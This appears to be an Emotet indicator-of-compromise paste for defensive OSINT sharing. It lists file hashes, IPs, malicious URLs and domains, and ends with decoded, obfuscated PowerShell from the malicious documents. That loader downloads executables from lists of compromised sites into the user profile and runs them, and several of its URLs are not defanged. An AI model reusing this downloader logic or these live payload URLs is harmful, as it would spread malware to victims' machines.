Emotet_Doc_out_2020-09-09_00_21.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4. 4ea973ca28598a64c32b8e2730d1cd64bd552dae1422638aa0806b7bb527165d
5. 68c5b0b61dcddea7b47c877d02a5d3d308d9753bcfd281a5aac05b1fbf496bf6
6. 1758c8233b795dda6dfd18b1e807adfb07f70ed1e7a75fab66b663d81ea5177f
7. 1758c8233b795dda6dfd18b1e807adfb07f70ed1e7a75fab66b663d81ea5177f
8. 4cadcc2c2f79c2311b46289689294ad17bc22ade70117e0d78b3d838124bd96e
9. c754a9e20e2c22ff468a1ab9f83d04a5e56f3c75d656fbe67fc15ec6857276eb
10. c754a9e20e2c22ff468a1ab9f83d04a5e56f3c75d656fbe67fc15ec6857276eb
11. a7feb70fc3867ed145a59e051b4869480f6afafbc9436c6fb7fbae07155cad73
12. 6cffaf302f33249146288f181c629138504d72143a68e3c79b67c5a9ad8cbf0b
13. 7a571bdfac93a5d054c876fd020668e2700d7c5220404591908b208f5a68d4ad
14. 67f9b719ffd1533656476b1e6f7eb63abe6dd3323f6ad28cc149d3e76750f0a1
15. ec694d65b8558d8ae93d7dcb5b232189d20440574c9eba95443c19f05de0cd20
16. f61f0a601ff5c59ec1b55108554619978b88cd832cef5dee74ebbfa64cb8b193
17. 9eae03556e525d06173366c525b5ebe9899a85ef229b3b3d7e43e0fe94f5fd93
18. 15de7545c8d13285e5cb83c314b0f47ad6428d10169a8d82ab09ab7d7b16bef3
19.  
20.  
21. IPs:
22. 103.133.215.103
23. 103.197.57.20
24. 139.59.134.225
25. 217.64.195.239
26. 217.76.132.193
27. 217.76.150.106
28. 217.76.150.65
29. 5.77.60.232
30. 69.163.217.214
31. 81.169.145.105
32. 81.169.145.151
33. 81.169.145.73
34. 81.169.145.84
35. 81.169.145.86
36.  
37.  
38.  
39. URLs:
40. hxxp://badaia.net/baiaseu/m4G4chJ/
41. hxxp://bbcalegal.com/attachments/AAyd/
42. hxxp://compartirwifi.com/WordPress_01/ZAa/."Sp`Lit"[char]42;
43. hxxp://mezes.de/title_htm_files/Mb/
44. hxxps://bosonit.com/wp-includes/We/
45. hxxp://vermasiyaahi.com/wp-content/8/
46.  
47.  
48.  
49. Domains:
50. badaia.net
51. bbcalegal.com
52. compartirwifi.com
53. mezes.de
54. bosonit.com
55. vermasiyaahi.com
56.  
57.  
58. Decoded Base64 Powershell:
59. $Nv4h9_2=Npfzmmi;
60. &new-item $env:USerpROfile\l70gE02\KErifx4\ -itemtype diREcToRy;
61. [Net.ServicePointManager]::"SecuRiT`Y`PROToc`ol" = tls12, tls11, tls;
62. $Kjlii0z = Lfqgw3;
63. $Krx83ci=Trd1xfs;
64. $Jh_l7tr=$env:userprofileVxwL70ge02VxwKerifx4Vxw -cRePLace Vxw,[CHAR]92$Kjlii0z.exe;
65. $Le2xz4b=B8n3agx;
66. $Urkgo8k=&new-object nET.wEbclient;
67. $T_gu0xv=http://www.agentstepp.com/ww12/6ZI/
68. hxxp://badaia.net/baiaseu/m4G4chJ/
69. http://www.bambagiotti.it/shop/ymwU6/
70. hxxp://bbcalegal.com/attachments/AAyd/
71. hxxp://mezes.de/title_htm_files/Mb/
72. http://computerfastfix.co.uk/css/DXj/
73. http://sacentrs.lv/wp-content/uploads/2018/Cc/."S`PLIT"[char]42;
74. $Tao2kc_=H4ohjxw;
75. foreach$Bfw8bu9 in $T_gu0xv{try{$Urkgo8k."do`wN`Lo`ADfilE"$Bfw8bu9, $Jh_l7tr;
76. $Yvab7e8=Kx76zrw;
77. If &Get-Item $Jh_l7tr."l`EnGtH" -ge 31817 {&Invoke-Item$Jh_l7tr;
78. $M0w23jo=Pn7p62o;
79. break;
80. $K5pgv2x=Umyheq5}}catch{}}$Un3z_hg=Q9j3ahv$Sxx24oa=Eqiyls5;
81. .new-item $enV:USERPRoFIlE\T46Uc61\K4aAAlc\ -itemtype diRecTORy;
82. [Net.ServicePointManager]::"SEcur`itYpRotO`C`OL" = tls12, tls11, tls;
83. $Xbqyfgn = Tui29h08;
84. $N5x7mbw=J_tuw7m;
85. $Tyhiq8n=$env:userprofile{0}T46uc61{0}K4aaalc{0}-F [cHAr]92$Xbqyfgn.exe;
86. $Cnwwcn7=Njrdlgs;
87. $Wqyop_x=.new-object NEt.WebCLIeNt;
88. $Qttfz2g=http://tskgear.com/wp-content/uploads/2017/NVa/
89. hxxp://vermasiyaahi.com/wp-content/8/
90. https://bauzeichnung.com/cgi-bin/8V/
91. http://bobenstetter.net/cgi-bin/V/
92. hxxps://bosonit.com/wp-includes/We/
93. http://chinese-photography.net/books/T7/
94. hxxp://compartirwifi.com/WordPress_01/ZAa/."Sp`Lit"[char]42;
95. $S4kvn65=Qz9tl0g;
96. foreach$Sej_u32 in $Qttfz2g{try{$Wqyop_x."dOwNl`Oa`DFI`le"$Sej_u32, $Tyhiq8n;
97. $X055ml7=Yzncvty;
98. If .Get-Item $Tyhiq8n."LEn`gth" -ge 23984 {&Invoke-Item$Tyhiq8n;
99. $W54w3pj=F_oqnxu;
100. break;
101. $Vhmnzlp=Dxzr24d}}catch{}}$Tbqfnce=Okelszv
102.